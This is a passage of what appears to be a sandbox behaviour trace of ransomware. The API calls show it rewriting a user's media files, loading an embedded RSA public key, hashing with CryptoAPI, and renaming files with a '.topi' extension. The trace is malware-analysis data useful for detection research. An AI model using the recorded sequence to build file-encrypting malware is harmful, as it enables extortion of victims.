returned 0x99d9d48 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbc38 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbc80 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5078 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.976] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50c0 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e50a8 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191bd8 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.977] GetCurrentThreadId () returned 0x8c4 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa850 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.978] GetCurrentThreadId () returned 0x8c4 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50d8 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5078 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbc80 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.981] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x8f21, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x8f21, lpOverlapped=0x0) returned 1 [0097.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.981] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8f26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.981] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.982] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.982] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.982] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.982] CloseHandle (hObject=0x6a8) returned 1 [0097.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe0) returned 0x3199338 [0097.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0097.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3199338 | out: hHeap=0x680000) returned 1 [0097.989] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\L0wpCqB_55lG bK7N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\l0wpcqb_55lg bk7n.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\L0wpCqB_55lG bK7N.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\l0wpcqb_55lg bk7n.flv.topi")) returned 1 [0097.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.990] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.991] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x958e8900, ftCreationTime.dwHighDateTime=0x1d5bbec, ftLastAccessTime.dwLowDateTime=0xf3bddd40, ftLastAccessTime.dwHighDateTime=0x1d5b66b, ftLastWriteTime.dwLowDateTime=0xf3bddd40, ftLastWriteTime.dwHighDateTime=0x1d5b66b, nFileSizeHigh=0x0, nFileSizeLow=0x3cab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qlx4jhl_sL7rq.avi", cAlternateFileName="QLX4JH~1.AVI")) returned 1 [0097.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x106) returned 0x31919a8 [0097.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.991] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\Qlx4jhl_sL7rq.avi") returned=".avi" [0097.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\Qlx4jhl_sL7rq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\qlx4jhl_sl7rq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.991] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=15531) returned 1 [0097.991] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.995] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x3c85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.995] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.996] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.996] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x3cab, lpOverlapped=0x0) returned 1 [0097.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.996] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.997] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.997] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.997] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.997] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, 